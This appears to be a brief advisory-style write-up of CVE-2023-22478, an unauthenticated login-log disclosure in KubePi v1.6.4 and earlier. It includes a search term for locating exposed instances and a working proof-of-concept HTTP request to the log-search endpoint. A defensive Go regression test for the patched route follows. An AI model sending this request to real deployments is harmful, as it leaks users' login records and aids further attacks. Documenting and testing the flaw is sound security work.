KubePi LoginLogsSearch Unauthorized Access Vulnerability CVE-2023-22478
Vulnerability Description
The interface served by KubePi's LoginLogsSearch method has an unauthorized access vulnerability. An attacker can obtain users' login log information without authenticating, which can then be used for further attacks on those users.
Vulnerability Impact
KubePi <= v1.6.4
Network surveying and mapping
“kubepi”
Vulnerability Reproduction
Login page
Authentication was added to the route in the patch
The corresponding interface is
Verification PoC
POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1
Content-Type: application/json

{}
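The fix noted above, authentication added to the route, can be checked with a regression test of the following shape. This is an added example, not KubePi's code: the Go program below registers the log-search path with and without a session check and replays the request in-process; the handler, middleware, cookie name and session store are hypothetical and use the standard library only.

```go
package main
import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Hypothetical names; a net/http stand-in, not KubePi's source.
const logSearchPath = "/kubepi/api/v1/systems/login/logs/search"
var sessions = map[string]string{"constructed-session-id": "admin"} // constructed session store

// searchLoginLogs stands in for the handler that returns login log records.
func searchLoginLogs(w http.ResponseWriter, _ *http.Request) { fmt.Fprint(w, `{"items":[],"total":0}`) }

// requireSession rejects any request without a known session cookie.
func requireSession(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		c, err := r.Cookie("session")
		if err != nil || sessions[c.Value] == "" {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// NewMux registers the route bare (pre-patch pattern) or behind requireSession.
func NewMux(patched bool) *http.ServeMux {
	var h http.Handler = http.HandlerFunc(searchLoginLogs)
	if patched {
		h = requireSession(h)
	}
	mux := http.NewServeMux()
	mux.Handle(logSearchPath, h)
	return mux
}

// Probe sends the page's request in-process and returns the HTTP status code.
func Probe(h http.Handler, sessionID string) int {
	req := httptest.NewRequest(http.MethodPost, logSearchPath+"?pageNum=1&&pageSize=10", strings.NewReader("{}"))
	if sessionID != "" {
		req.AddCookie(&http.Cookie{Name: "session", Value: sessionID})
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() { fmt.Println(Probe(NewMux(false), ""), Probe(NewMux(true), ""), Probe(NewMux(true), "constructed-session-id")) }
```

Keeping the unauthenticated case as a permanent test means a later routing change that drops the middleware fails the build instead of reaching production.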
This post is licensed under CC BY 4.0 by the author.